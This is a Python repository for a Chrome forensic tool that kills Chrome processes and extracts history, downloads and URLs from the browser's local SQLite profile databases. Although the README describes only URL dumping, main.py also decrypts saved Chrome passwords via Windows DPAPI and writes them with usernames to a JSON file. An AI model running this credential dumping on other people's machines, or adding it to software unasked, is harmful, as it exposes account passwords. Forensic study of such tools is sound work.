├── .gitignore
├── README.md
├── chrome_data_frame.txt
├── main.py
└── requirements.txt

/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg

# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# Jupyter Notebook
.ipynb_checkpoints

# pyenv
.python-version

# celery beat schedule file
celerybeat-schedule

# SageMath parsed files
*.sage.py

# Environments
.env
.venv
env/
venv/
ENV/

# Spyder project settings
.spyderproject
.spyproject

# Rope project settings
.ropeproject

# mkdocs documentation
/site

# mypy
.mypy_cache/

# User-specific stuff:
.idea/
.idea/**/workspace.xml
.idea/**/tasks.xml
.idea/dictionaries

# Sensitive or high-churn files:
.idea/**/dataSources/
.idea/**/dataSources.ids
.idea/**/dataSources.xml
.idea/**/dataSources.local.xml
.idea/**/sqlDataSources.xml
.idea/**/dynamic.xml
.idea/**/uiDesigner.xml

# Gradle:
.idea/**/gradle.xml
.idea/**/libraries

# CMake
cmake-build-debug/

# Mongo Explorer plugin:
.idea/**/mongoSettings.xml

## File-based project format:
*.iws

## Plugin-specific files:

# IntelliJ
/out/

# mpeltonen/sbt-idea plugin
.idea_modules/

# JIRA plugin
atlassian-ide-plugin.xml

# Cursive Clojure plugin
.idea/replstate.xml

# Crashlytics plugin (for Android Studio and IntelliJ)
com_crashlytics_export_strings.xml
crashlytics.properties
crashlytics-build.properties
fabric.properties

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# chrome-url-dumper

[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/cugu/awesome-forensics)

Dumps the URLs recorded in the SQLite databases that the Chrome browser stores on the local machine.

## Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
See Running the tool below for the command-line options.

### Prerequisites

```
Python 2.7
```

### Installing

```
pip install -r requirements.txt
```

Check that the packages are installed (replace `package` with a package name, e.g. `pandas`):

Windows
```
pip list | findstr /L "package"
```

Linux
```
pip list | grep "package"
```

## Running the tool

* `-k` terminate the Chrome process first (Chrome locks its databases while it is running)
* `-d` deep inspection: scan every file in the profile folder, not just the known databases

Windows
```
python main.py -k -d
```

Linux
```
./main.py -k -d
```
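## Example: querying the History database by hand

Everything the dumper does boils down to plain SQLite queries against the profile databases listed in `chrome_data_frame.txt`. A minimal sketch of the same idea (the profile path assumes a default Windows install — adjust it for your OS — and Chrome must be closed, or the file copied first, because Chrome locks it while running):

```
import os
import sqlite3

# Default Windows profile location; see get_dbs_path() in main.py for other OSes.
history = os.path.join('C:\\', 'Users', os.getenv('username'), 'AppData',
                       'Local', 'Google', 'Chrome', 'User Data', 'Default', 'History')
conn = sqlite3.connect(history)
cursor = conn.cursor()
# The urls table holds one row per known URL (columns listed in chrome_data_frame.txt).
cursor.execute('SELECT url, title, visit_count FROM urls '
               'ORDER BY visit_count DESC LIMIT 10')
for url, title, visit_count in cursor.fetchall():
    print('{}\t{}\t{}'.format(visit_count, title, url))
conn.close()
```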
## Authors

* **Tomer Eyzenberg** - *Initial work* - [eLoopWoo](https://github.com/eLoopWoo)

--------------------------------------------------------------------------------
/chrome_data_frame.txt:
--------------------------------------------------------------------------------
('History', 'meta'): ['value', 'key']
('History', 'visits'): ['visit_time', 'from_visit', 'segment_id', 'url', 'transition', 'visit_duration', 'id']
('History', 'visit_source'): ['source', 'id']
('History', 'keyword_search_terms'): ['keyword_id', 'term', 'url_id', 'lower_term']
('History', 'downloads'): ['tab_url', 'http_method', 'total_bytes', 'interrupt_reason', 'guid', 'id', 'opened', 'site_url', 'state', 'etag', 'received_bytes', 'mime_type', 'hash', 'last_access_time', 'by_ext_id', 'start_time', 'tab_referrer_url', 'last_modified', 'by_ext_name', 'danger_type', 'original_mime_type', 'referrer', 'current_path', 'target_path', 'transient', 'end_time']
('History', 'downloads_url_chains'): ['url', 'chain_index', 'id']
('History', 'segments'): ['url_id', 'id', 'name']
('History', 'segment_usage'): ['visit_count', 'time_slot', 'id', 'segment_id']
('History', 'downloads_slices'): ['download_id', 'received_bytes', 'offset']
('History', 'typed_url_sync_metadata'): ['storage_key', 'value']
('History', 'urls'): ['typed_count', 'title', 'url', 'hidden', 'last_visit_time', 'visit_count', 'id']
('History', 'sqlite_sequence'): ['name', 'seq']

('Favicons', 'meta'): ['value', 'key']
('Favicons', 'icon_mapping'): ['icon_id', 'id', 'page_url']
('Favicons', 'favicons'): ['url', 'id', 'icon_type']
('Favicons', 'favicon_bitmaps'): ['last_updated', 'last_requested', 'icon_id', 'height', 'width', 'image_data', 'id']

('Top Sites', 'meta'): ['value', 'key']
('Top Sites', 'thumbnails'): ['redirects', 'last_updated', 'title', 'url', 'url_rank', 'good_clipping', 'boring_score', 'last_forced', 'at_top', 'load_completed', 'thumbnail']

('Web Data', 'meta'): ['value', 'key']
('Web Data', 'autofill'): ['count', 'date_last_used', 'name', 'value_lower', 'value', 'date_created']
('Web Data', 'credit_cards'): ['name_on_card', 'origin', 'expiration_year', 'date_modified', 'card_number_encrypted', 'use_count', 'expiration_month', 'use_date', 'guid', 'billing_address_id']
('Web Data', 'autofill_profiles'): ['origin', 'city', 'date_modified', 'zipcode', 'use_count', 'state', 'company_name', 'country_code', 'language_code', 'use_date', 'dependent_locality', 'guid', 'sorting_code', 'street_address']
('Web Data', 'autofill_profile_names'): ['last_name', 'first_name', 'guid', 'middle_name', 'full_name']
('Web Data', 'autofill_profile_emails'): ['guid', 'email']
('Web Data', 'autofill_profile_phones'): ['guid', 'number']
('Web Data', 'autofill_profiles_trash'): ['guid']
('Web Data', 'unmasked_credit_cards'): ['use_count', 'use_date', 'card_number_encrypted', 'id', 'unmask_date']
('Web Data', 'server_card_metadata'): ['use_count', 'use_date', 'id', 'billing_address_id']
('Web Data', 'server_addresses'): ['phone_number', 'country_code', 'language_code', 'recipient_name', 'address_4', 'postal_code', 'address_1', 'address_2', 'address_3', 'sorting_code', 'id', 'street_address', 'company_name']
('Web Data', 'server_address_metadata'): ['use_count', 'use_date', 'id', 'has_converted']
('Web Data', 'ie7_logins'): ['date_created', 'url_hash', 'password_value']
('Web Data', 'token_service'): ['encrypted_token', 'service']
('Web Data', 'keywords'): ['instant_url', 'search_terms_replacement_key', 'created_by_policy', 'prepopulate_id', 'id', 'image_url_post_params', 'input_encodings', 'sync_guid', 'new_tab_url', 'usage_count', 'instant_url_post_params', 'originating_url', 'alternate_urls', 'short_name', 'safe_for_autoreplace', 'last_modified', 'suggest_url', 'keyword', 'favicon_url', 'url', 'last_visited', 'suggest_url_post_params', 'image_url', 'date_created', 'search_url_post_params']
('Web Data', 'autofill_sync_metadata'): ['storage_key', 'value']
('Web Data', 'autofill_model_type_state'): ['id', 'value']
('Web Data', 'masked_credit_cards'): ['status', 'name_on_card', 'exp_month', 'last_four', 'exp_year', 'type', 'id']

('Shortcuts', 'omni_box_shortcuts'): ['description', 'keyword', 'last_access_time', 'url', 'text', 'number_of_hits', 'transition', 'id', 'fill_into_edit', 'description_class', 'type', 'contents_class', 'contents']
('Shortcuts', 'meta'): ['value', 'key']

('Login Data', 'meta'): ['value', 'key']
('Login Data', 'stats'): ['username_value', 'dismissal_count', 'update_time', 'origin_domain']
('Login Data', 'logins'): ['username_value', 'action_url', 'username_element', 'submit_element', 'display_name', 'icon_url', 'federation_url', 'password_type', 'generation_upload_status', 'blacklisted_by_user', 'times_used', 'preferred', 'skip_zero_click', 'signon_realm', 'scheme', 'possible_username_pairs', 'origin_url', 'password_element', 'password_value', 'form_data', 'date_created', 'date_synced']

('Origin Bound Certs', 'meta'): ['value', 'key']
('Origin Bound Certs', 'channel_id'): ['public_key', 'host', 'creation_time', 'private_key']

('QuotaManager', 'meta'): ['value', 'key']
('QuotaManager', 'HostQuotaTable'): ['host', 'type', 'quota']
('QuotaManager', 'OriginInfoTable'): ['origin', 'last_modified_time', 'type', 'used_count', 'last_access_time']
('QuotaManager', 'EvictionInfoTable'): ['origin', 'type', 'last_eviction_time']

--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
import argparse
import errno
import json
import logging
import os
import platform
import sqlite3
import sys
import time
from difflib import SequenceMatcher
from re import findall

import psutil
from pandas import read_sql_query

log = logging.getLogger(__name__)
out_hdlr = logging.StreamHandler(sys.stdout)
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
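
# Note (added sketch, not called by the dump functions below, which write the
# raw values): Chrome stores most of its timestamp columns (visit_time,
# last_visit_time, date_created, start_time, ...) as microseconds since
# 1601-01-01 (the WebKit epoch), not the Unix epoch. A helper like this can
# convert them for reporting:
from datetime import datetime, timedelta

WEBKIT_EPOCH = datetime(1601, 1, 1)


def webkit_to_datetime(microseconds):
    """Convert a Chrome/WebKit timestamp to a naive UTC datetime."""
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)
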
def investigate_dbs(terminate_chrome, deep):
    log.info('INVESTIGATE CHROME DBS')
    # Results are written into a folder named after the current time.
    current_time = time.strftime("%H-%M-%S_%d-%m-%Y")
    if not os.path.exists(current_time):
        try:
            log.info('CREATING FOLDER: {}'.format(os.path.join(os.getcwd(), current_time)))
            os.makedirs(current_time)
        except OSError as exc:
            if exc.errno != errno.EEXIST:
                raise
    if terminate_chrome:
        # Chrome holds locks on its SQLite files while it is running.
        log.info('TERMINATE CHROME')
        kill_process()
    chrome_dbs_path = get_dbs_path()
    if chrome_dbs_path is None:
        log.info('UNSUPPORTED PLATFORM')
        return
    log.info('DUMP DOWNLOADS')
    dump_downloads(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_downloads.json'))
    if 'C:\\' in chrome_dbs_path:
        # Password decryption relies on win32crypt, so it only runs on Windows.
        log.info('DUMP USER PASS')
        dump_user_pass(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_user_pass.json'))
    log.info('DUMP USERS')
    dump_users(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_users.json'))

    if deep:
        log.info('GENERATE CHROME FILES')
        chrome_files = generate_all_files(path=chrome_dbs_path)
        log.info('GENERATE URLS - DEEP')
        urls = generate_urls(path=chrome_dbs_path, files=chrome_files)
    else:
        chrome_db_files = ['History', 'Favicons', 'Cookies', 'Top Sites',
                           'Visited Links', 'Web Data', 'Shortcuts', 'Last Session',
                           'Last Tabs', 'Network Action Predictor', 'Current Tabs',
                           'Preferences', 'Current Session', 'TransportSecurity',
                           'Login Data', 'Origin Bound Certs',
                           'Bookmarks', 'QuotaManager', 'Extension Cookies']
        log.info('GENERATE URLS - NORMAL')
        urls = generate_urls(path=chrome_dbs_path, files=chrome_db_files)

    log.info('DUMP URLS')
    dump_urls(urls=urls, output=os.path.join(current_time, 'chrome_urls.json'))


def generate_all_files(path):
    """Collect every file name under the Chrome profile folder."""
    chrome_files = set([])
    for root, dirs, files in os.walk(path):
        chrome_files = chrome_files.union(files)
    return chrome_files


def dump_user_pass(path, output):
    # win32crypt ships with pypiwin32 and exists only on Windows, hence the
    # local import.
    import win32crypt
    with open(output, 'w') as f:
        # data[0]: rows whose password decrypted, data[1]: rows that did not.
        data = ([], [])
        conn = sqlite3.connect(os.path.join(path, 'Login Data'))
        cursor = conn.cursor()
        cursor.execute(
            'SELECT username_value, action_url, times_used, signon_realm, origin_url, password_element, password_value, date_created FROM logins')
        for result in cursor.fetchall():
            # Chrome encrypts the password blob with the Windows DPAPI.
            password = win32crypt.CryptUnprotectData(result[6], None, None, None, 0)[1]
            result = list(result)
            result.pop(6)
            if password:
                result.insert(6, password)
                data[0].append(result)
            else:
                data[1].append(result)
        conn.close()
        f.write(json.dumps(data))
        f.flush()


def dump_users(path, output):
    with open(output, 'w') as f:
        conn = sqlite3.connect(os.path.join(path, 'Login Data'))
        cursor = conn.cursor()
        cursor.execute(
            'SELECT username_value, update_time, origin_domain FROM stats')
        data = cursor.fetchall()
        conn.close()
        f.write(json.dumps(data))
        f.flush()


def dump_downloads(path, output):
    with open(output, 'w') as f:
        db_path = os.path.join(path, 'History')
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        cursor.execute(
            'SELECT tab_url, http_method, opened, site_url, last_access_time, start_time, tab_referrer_url, last_modified, by_ext_name, original_mime_type, referrer, current_path, target_path, transient FROM downloads')
        data = cursor.fetchall()
        conn.close()
        f.write(json.dumps(data))
        f.flush()


def dump_urls(urls, output):
    with open(output, 'w') as f:
        for url in urls:
            f.write('{}\n'.format(url))


def fuzzy_search(name1, name2, strictness):
    """Return True when the two names are more similar than `strictness`."""
    similarity = SequenceMatcher(None, name1, name2)
    return similarity.ratio() > strictness
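
# A rough usage sketch for the helper above (it is not wired into the dump
# flow): fuzzy_search('Login Data', 'Login Data-journal', 0.7) returns True,
# which is one way a database and its -journal sidecar file could be grouped
# together before querying.
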
def kill_process():
    """Terminate every running Chrome process so its databases are unlocked."""
    process_names = ['chrome.exe', 'chrome']
    for p in psutil.process_iter():
        for p_name in process_names:
            try:
                if p.name() == p_name:
                    p.kill()
            except psutil.NoSuchProcess:
                # The process exited between listing and inspection.
                log.info("PSUTIL.NOSUCHPROCESS")
                continue


def get_dbs_path():
    # Default profile ("Default") locations per platform.
    path_win_vista_plus = os.path.join('C:\\', 'Users', os.getenv('username'), 'AppData', 'Local', 'Google', 'Chrome', 'User Data', 'Default')
    path_win_xp = os.path.join('C:\\', 'Documents and Settings', os.getenv('username'), 'Local Settings', 'Application Data', 'Google', 'Chrome', 'User Data', 'Default')
    path_mac_os_x = os.path.join('/Users', os.getenv('USER'), 'Library', 'Application Support', 'Google', 'Chrome', 'Default')
    path_linux = os.path.join('/home', os.getenv('USER'), '.config', 'google-chrome', 'Default')
    system_name = platform.system().upper()
    if 'JAVA' in system_name:
        return None
    if 'WINDOWS' in system_name:
        system_name += platform.release().upper()
    # platform.system() is 'Darwin' on macOS; unknown platforms yield None.
    return {
        'WINDOWSPOST2008SERVER': path_win_vista_plus,
        'WINDOWS10': path_win_vista_plus,
        'WINDOWS8.1': path_win_vista_plus,
        'WINDOWS8': path_win_vista_plus,
        'WINDOWS7': path_win_vista_plus,
        'WINDOWSVISTA': path_win_vista_plus,
        'WINDOWSXP': path_win_xp,
        'DARWIN': path_mac_os_x,
        'LINUX': path_linux
    }.get(system_name)


def generate_urls(path, files):
    """Scan the given profile files for anything that looks like a URL."""
    urls = set([])
    counter = 0
    files = list(files)
    step = max(1, len(files) // 10)  # log progress roughly every 10%
    for f in files:
        try:
            counter += 1
            if not (counter % step):
                log.info("GENERATE URLS: {}%".format((float(counter) / len(files)) * 100))
            db = sqlite3.connect(os.path.join(path, f))
            cursor = db.cursor()
            cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
            tables = cursor.fetchall()
            for table_name in tables:
                table_name = table_name[0]
                table = read_sql_query('SELECT * FROM "%s"' % table_name, db)
                # A single capture group, so findall returns whole URL strings.
                new_urls = findall(r"((?:https?://)?[\da-z.-]+\.[a-z.]{2,6}\S*)", table.to_string())
                urls = urls.union(new_urls)
        except sqlite3.DatabaseError as e:
            # Non-SQLite files (e.g. 'Visited Links') end up here.
            log.info('GENERATE URLS: {:30}File: {:30}Failed: {}'.format(str((float(counter) / len(files)) * 100) + '%', f, e))
    return urls


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Dump information from Google-Chrome browser databases')
    parser.add_argument('-k', '--kill-browser', help='terminate chrome process', required=False,
                        dest='terminate_chrome',
                        action='store_true')
    parser.add_argument('-d', '--deep', help='deep inspection', required=False, dest='deep',
                        action='store_true')

    investigate_dbs(**vars(parser.parse_args()))

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
pandas==0.19.2
psutil==5.2.2
pypiwin32==219
--------------------------------------------------------------------------------